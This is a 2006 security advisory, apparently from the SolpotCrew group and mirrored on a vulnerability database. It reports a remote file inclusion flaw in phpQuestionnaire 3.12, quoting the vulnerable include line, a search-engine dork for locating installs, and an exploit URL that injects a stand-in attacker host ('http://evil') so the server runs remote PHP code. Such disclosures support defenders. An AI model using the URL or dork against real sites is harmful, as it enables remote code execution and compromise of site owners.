Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14386
HistorySep 22, 2006 - 12:00 a.m.

phpQuestionnaire 3.12 (GLOBALS[phpQRootDir]) Remote File Inclusion

2006-09-2200:00:00
vulners.com
30

#############################SolpotCrew Community################################

phpQuestionnaire 3.12 (GLOBALS[phpQRootDir]) Remote File Inclusion

vendor : http://www.chumpsoft.com/products/phpq/

#################################################################################

Bug Found By :Solpot a.k.a (k. Hasibuan) (21-09-2006)

contact: [email protected]

Website : http://www.nyubicrew.org/adv/solpot-adv-08.txt

################################################################################

Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid

robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa

home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo

Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX

x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^

and all member solpotcrew community

especially thx to str0ke @ milw0rm.com

###############################################################################
Input passed to the "GLOBALS[phpQRootDir]" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from inc/ifunctions.php

################################################################################

phpQuestionnaire Version 3.12

Copyright 2003-2006 chumpsoft, inc. August 7, 2006

http://www.chumpsoft.com/products/phpq/ [email protected]

################################################################################

Use of this program constitutes your agreement to the terms contained in the

LICENSE file within this distribution.

################################################################################

include($GLOBALS["phpQRootDir"] . "inc/tableformat.php");

function ImportSurvey ($fp, $type, $flag) {
set_time_limit(600); # Attempt to disable time limit in case upgrade takes long

google dork : "phpQuestionnaire v3"

exploit : http://somehost/path_to_phpQuestionnaire/inc/ifunctions.php?GLOBALS[phpQRootDir]=http://evil

##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################